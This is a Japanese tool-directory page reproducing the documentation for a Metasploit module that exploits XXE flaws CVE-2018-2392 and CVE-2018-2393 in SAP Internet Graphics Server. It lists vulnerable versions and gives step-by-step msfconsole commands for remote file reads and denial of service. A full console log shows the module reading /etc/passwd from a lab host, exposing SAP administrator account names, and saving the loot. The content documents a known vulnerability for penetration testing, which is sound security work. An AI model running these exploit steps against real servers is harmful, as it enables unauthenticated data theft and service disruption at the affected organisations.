Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
sap_igs_xxe — SAP IGS XXE攻撃 CVE-2018-2392 および CVE-2018-2393 | Kitploit
ツール/GitHubGitHub/vladimir-ivanov-git/sap_igs_xxe
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubvladimir-ivanov-git/sap_igs_xxe

sap_igs_xxe

SAP IGS XXE攻撃 CVE-2018-2392 および CVE-2018-2393

リポジトリを見る
15年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SAP IGS XXE攻撃 CVE-2018-2392 および CVE-2018-2393

Metasploit Framework の本モジュール

ドキュメント

モジュール

脆弱性のあるアプリケーション

このモジュールは、SAP Internet Graphics Server (IGS) のバージョン 7.20、7.20EXT、7.45、7.49、または 7.53 を実行している XMLCHART ページ内の 2 つの XXE 脆弱性、CVE-2018-2392 と CVE-2018-2393 を悪用します。これらの 脆弱性は、新しいチャートを生成するために XMLCHART ページへ POST リクエストを送信する際に、Extension HTML タグに対する適切な検証が欠如しているために発生します。

悪用に成功すると、認証されていないリモートの攻撃者が、IGS サービスが起動されているユーザー(通常は SAP 管理者ユーザー)としてサーバーからファイルを読み取ることができます。あるいは、攻撃者は XXE 脆弱性を悪用して、脆弱性のある SAP IGS サーバーに対してサービス拒否攻撃を行うこともできます。

アプリケーションの背景

Internet Graphics Service (IGS) は、開発者が最小限の労力でインターネットブラウザにグラフィックを表示できるようにするインフラストラクチャを提供します。これはいくつかの異なる SAP UI テクノロジーに統合されており、 別の SAP システムまたはデータソースからのデータを利用して、動的なグラフィカル出力または非グラフィカル出力を生成する方法を提供します。

インストール手順

SAP IGS サーバーのインストールおよび更新手順は、このページ でオンラインで見つけることができます。 IGS サーバーの設定に関する追加情報は、こちら にあります。 最後に、IGS サーバーの管理に関する情報は、 にあります。

こちら

セットアップと設定が完了すると、インスタンスはデフォルトの HTTP ポート 40080 で脆弱になります。

検証手順

  1. msfconsole を起動します
  2. 実行: workspace [WORKSPACE]
  3. 実行: use auxiliary/admin/sap/sap_igs_xmlchart_xxe
  4. 実行: set RHOSTS [IP]
  5. 実行: set FILE [リモートファイル名]
  6. 実行: set action READ
  7. 実行: check
  8. check メソッドがターゲットが脆弱かどうかを正しく識別することを確認します。
  9. 実行: run
  10. 指定したファイルの内容が返されたことを確認します。

オプション

FILE

リモートサーバーから読み取るファイル。例: /etc/passwd

URIPATH

これは、XXE に対して脆弱な SAP IGS サーバーの XMLCHART ページへのパスです。 デフォルトでは /XMLCHART に設定されていますが、SAP IGS サーバーが Web ルートとは異なるパスの下にインストールされている場合は変更できます。たとえば、SAP IGS サーバーが Web ルートの下の /igs/ パスにインストールされている場合、この値は /igs/XMLCHART に設定されます。

アクション

root@kitploit:~
   Name  Description
   ----  -----------
   READ  Remote file read
   DOS   Denial Of Service

シナリオ

脆弱な SAP IGS リリース: SUSE Linux Enterprise Server for SAP Applications 12 SP1 上で動作する 7.45

root@kitploit:~
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FILE     /etc/passwd          no        File to read from the remote server
   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.30.29         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080                yes       The target port (TCP)
   SSL      false                no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /XMLCHART            yes       Path to the SAP IGS XMLCHART page from the web root
   VHOST                         no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29

[+] File: /etc/passwd content from host: 172.16.30.29
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                             References
---------                ----          ----                                             ----------
2020-10-07 10:12:37 UTC  172.16.30.29  SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot

Loot
====

host          service  type              name         content     info                  path
----          -------  ----              ----         -------     ----                  ----
172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt

Burp での HTTP チェックリクエスト

HTTP check request in Burp

Burp でリモートの /etc/passwd ファイルを取得する最初の HTTP リクエスト

First HTTP request to get remote /etc/passwd file in Burp

Burp でリモートの /etc/passwd ファイルを取得する 2 番目の HTTP リクエスト

Second HTTP request to get remote /etc/passwd file in Burp

デモビデオ

Demo video

ツールをダウンロード